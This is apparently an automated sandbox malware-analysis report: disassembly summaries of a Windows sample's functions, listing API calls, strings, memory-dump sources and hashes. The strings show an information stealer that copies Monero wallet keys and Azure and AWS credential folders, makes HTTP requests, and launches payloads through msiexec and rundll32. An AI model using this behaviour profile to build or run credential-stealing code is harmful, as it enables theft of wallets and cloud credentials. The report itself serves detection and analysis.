                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,01B89EE8,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECCF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00ECD0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ECD0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD208
                                • lstrcat.KERNEL32(?,00EE1478), ref: 00ECD217
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD22A
                                • lstrcat.KERNEL32(?,00EE147C), ref: 00ECD239
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD24C
                                • lstrcat.KERNEL32(?,00EE1480), ref: 00ECD25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD26E
                                • lstrcat.KERNEL32(?,00EE1484), ref: 00ECD27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD290
                                • lstrcat.KERNEL32(?,00EE1488), ref: 00ECD29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD2B2
                                • lstrcat.KERNEL32(?,00EE148C), ref: 00ECD2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD2D4
                                • lstrcat.KERNEL32(?,00EE1490), ref: 00ECD2E3
                                  • Part of subcall function 00EDA820: lstrlen.KERNEL32(00EC4F05,?,?,00EC4F05,00EE0DDE), ref: 00EDA82B
                                  • Part of subcall function 00EDA820: lstrcpy.KERNEL32(00EE0DDE,00000000), ref: 00EDA885
                                • lstrlen.KERNEL32(?), ref: 00ECD32A
                                • lstrlen.KERNEL32(?), ref: 00ECD339
                                  • Part of subcall function 00EDAA70: StrCmpCA.SHLWAPI(01B88A70,00ECA7A7,?,00ECA7A7,01B88A70), ref: 00EDAA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECD3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 8fa6de29405962520765938ff27f8888cb4e2910720ea31b25f8262cef8bcf72
                                • Instruction ID: e72d1d2502e7280ec9fe85a82053a8928d4ab368b62ca497302f51b1ac162d5c
                                • Opcode Fuzzy Hash: 8fa6de29405962520765938ff27f8888cb4e2910720ea31b25f8262cef8bcf72
                                • Instruction Fuzzy Hash: 84E171728002089BCB19EBA0ED96EEE73B8FF14301F04517AF516B3181DE75AB46DB61
                                Function 00ECC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,01B8CEC8,00000000,?,00EE144C,00000000,?,?), ref: 00ECCA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00ECCA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00ECCA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ECCAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00ECCAD9
                                • StrStrA.SHLWAPI(?,01B8CE38,00EE0B52), ref: 00ECCAF7
                                • StrStrA.SHLWAPI(00000000,01B8CDF0), ref: 00ECCB1E
                                • StrStrA.SHLWAPI(?,01B8D358,00000000,?,00EE1458,00000000,?,00000000,00000000,?,01B88A00,00000000,?,00EE1454,00000000,?), ref: 00ECCCA2
                                • StrStrA.SHLWAPI(00000000,01B8D298), ref: 00ECCCB9
                                  • Part of subcall function 00ECC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ECC871
                                  • Part of subcall function 00ECC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ECC87C
                                • StrStrA.SHLWAPI(?,01B8D298,00000000,?,00EE145C,00000000,?,00000000,01B88A50), ref: 00ECCD5A
                                • StrStrA.SHLWAPI(00000000,01B888C0), ref: 00ECCD71
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B46), ref: 00ECC943
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B47), ref: 00ECC957
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B4E), ref: 00ECC978
                                • lstrlen.KERNEL32(00000000), ref: 00ECCE44
                                • CloseHandle.KERNEL32(00000000), ref: 00ECCE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 7bd2a4d16efea06eba6c3a45751f744eba5190e7071d4b5181cf9ff292e4c1bf
                                • Instruction ID: cd05114e574cbd3458036e470b5596fc997e9941d6268d8b00a88f313cbd014b
                                • Opcode Fuzzy Hash: 7bd2a4d16efea06eba6c3a45751f744eba5190e7071d4b5181cf9ff292e4c1bf
                                • Instruction Fuzzy Hash: 84E10C76800148AACB19EBA0DC95FEE77B8EF54300F44516AF50673291DE706B8BCB65
                                Function 00ED8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • RegOpenKeyExA.ADVAPI32(00000000,01B8AEC0,00000000,00020019,00000000,00EE05B6), ref: 00ED83A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00ED8426
                                • wsprintfA.USER32 ref: 00ED8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00ED847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8499
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: e750ccd1c1aab1bb93e721dc1c5e55d744765a13c98ff12fe24093aa089ebaba
                                • Instruction ID: 5431431c43f89785cadc67b314f2dbcd9b8f9b1cf9b0500426d2e143c2dff626
                                • Opcode Fuzzy Hash: e750ccd1c1aab1bb93e721dc1c5e55d744765a13c98ff12fe24093aa089ebaba
                                • Instruction Fuzzy Hash: 26811E719102189BDB29DF50DD95FEA77B8FF48700F0092AAE509A6240DF716B86CF94
                                Function 00ED4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00ED4DCD
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED492C
                                  • Part of subcall function 00ED4910: FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00ED4E59
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                  • Part of subcall function 00ED4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                  • Part of subcall function 00ED4910: FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00ED4EE5
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED49B0
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE08D2), ref: 00ED49C5
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED49E2
                                  • Part of subcall function 00ED4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00ED4A1E
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,01B8E360), ref: 00ED4A4A
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,00EE0FF8), ref: 00ED4A5C
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,?), ref: 00ED4A70
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,00EE0FFC), ref: 00ED4A82
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,?), ref: 00ED4A96
                                  • Part of subcall function 00ED4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00ED4AAC
                                  • Part of subcall function 00ED4910: DeleteFileA.KERNEL32(?), ref: 00ED4B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 97810b2c89f941123e0978de14277f2ce1df51b6d9bfc7cdd1d93d46e53bac75
                                • Instruction ID: 4ce3c7f2187fcee8ae73bc33c97e893502b27c455addbcdd9f04cccda05a62cd
                                • Opcode Fuzzy Hash: 97810b2c89f941123e0978de14277f2ce1df51b6d9bfc7cdd1d93d46e53bac75
                                • Instruction Fuzzy Hash: 6C41D6BA94030867CB14F770EC47FED3378AB60700F0055A57289721C1EDB59BCA8B92
                                Function 00ED9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00ED906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 537c281c599cc3a510d2f74254b06b812795a81b0334b68c2407327a6d2df57d
                                • Instruction ID: fed37d08e9ca6a097c4e21ee18005ed1984b36c4592e905516235c0edcd39c0e
                                • Opcode Fuzzy Hash: 537c281c599cc3a510d2f74254b06b812795a81b0334b68c2407327a6d2df57d
                                • Instruction Fuzzy Hash: 3771ED75D10208ABDB18DBE4ED89FEEB7B8FF48300F108519F516A7284DB75A945CB60
                                Function 00ED2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED31C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED34EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 3260ee8560272c4d04b0f4f6fedf932b5d03413cedf8dd4b264bb3c11562aff3
                                • Instruction ID: ec3daabb3cc6a394333b299ec62dc525e10d136d909461e1f71274cbc2a073a9
                                • Opcode Fuzzy Hash: 3260ee8560272c4d04b0f4f6fedf932b5d03413cedf8dd4b264bb3c11562aff3
                                • Instruction Fuzzy Hash: 66123E768001089ADB19EBA0DD96FEDB7B8EF54300F44516AF50676291EF702B4BCF62
                                Function 00ED52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC6280: InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                  • Part of subcall function 00EC6280: StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC6303
                                  • Part of subcall function 00EC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                  • Part of subcall function 00EC6280: HttpOpenRequestA.WININET(00000000,GET,?,01B8DA10,00000000,00000000,00400100,00000000), ref: 00EC6385
                                  • Part of subcall function 00EC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                  • Part of subcall function 00EC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5318
                                • lstrlen.KERNEL32(00000000), ref: 00ED532F
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00ED5364
                                • lstrlen.KERNEL32(00000000), ref: 00ED5383
                                • lstrlen.KERNEL32(00000000), ref: 00ED53AE
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 6003f5154008f1a1d9abce5da5bedc0c847510fcf0cf34bf28f48ae86f731101
                                • Instruction ID: c969cae39c75680c89c285a39789b514df2aa7cc9976e1518805f19083ef298f
                                • Opcode Fuzzy Hash: 6003f5154008f1a1d9abce5da5bedc0c847510fcf0cf34bf28f48ae86f731101
                                • Instruction Fuzzy Hash: 8A511B359101489BCB18FF64D996AED77B9EF10300F54602AF8067A292EF346B47DB62
                                Function 00ED12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: dff6ca99cc3e0670e132e871b64810bef6445bde43fc8f48c0b63c93ef4db250
                                • Instruction ID: c28c2c242354d2b73cd32626e9f9e6216c092ce3da464a4e985d07e1f8de68a7
